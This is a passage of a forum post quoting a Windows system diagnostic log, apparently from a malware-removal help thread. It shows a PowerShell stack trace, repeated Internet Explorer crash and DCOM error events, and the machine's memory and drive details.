PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2() at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action) at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[]) at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord() at System.Management.Automation.Cmdlet.DoProcessRecord() at System.Management.Automation.CommandProcessor.ProcessRecord() at System.Management.Automation.CommandProcessorBase.DoExecute() at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean) at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext) at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2() at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action) at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[]) at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord() at System.Management.Automation.Cmdlet.DoProcessRecord() at System.Management.Automation.CommandProcessor.ProcessRecord() at System.Management.Automation.CommandProcessorBase.DoExecute() at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean) at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext) at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object) at System.Management.Automation.DlrScriptCommandProcessor.Complete() at System.Management.Automation.CommandProcessorBase.DoComplete() at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean) at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper() at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc() at System.Management.Automation.Runspaces.PipelineThread.WorkerProc() at System.Threading.ThreadHelper.ThreadStart_Context(System.Object) at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) at System.Threading.ThreadHelper.ThreadStart() Error: (11/30/2014 07:39:05 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a55f Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1f5ec Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:20:52 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x6c90 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:19:12 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x2923c Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 System errors: ============= Error: (11/30/2014 09:08:33 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 09:08:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 09:07:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 09:07:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 09:00:52 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 51. The Windows SChannel error state is 900. Error: (11/30/2014 08:56:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 08:55:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 08:55:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 08:54:29 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/30/2014 08:53:58 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Microsoft Office Sessions: ========================= ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz Percentage of memory in use: 28% Total physical RAM: 8074.77 MB Available physical RAM: 5737.82 MB Total Pagefile: 16266.77 MB Available Pagefile: 13875.43 MB Total Virtual: 8192 MB Available Virtual: 8191.78 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:671.53 GB) (Free:279.17 GB) NTFS ==>[System with boot components (obtained from reading drive)] Drive d: (RECOVERY) (Fixed) (Total:26.33 GB) (Free:3.11 GB) NTFS ==>[System with boot components (obtained from reading drive)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 698.6 GB) (Disk ID: 04463ED8) Partition: GPT Partition Type. ==================== End Of Log ============================ [/QUOTE]
Insert quotes…
Verification
Post reply
Top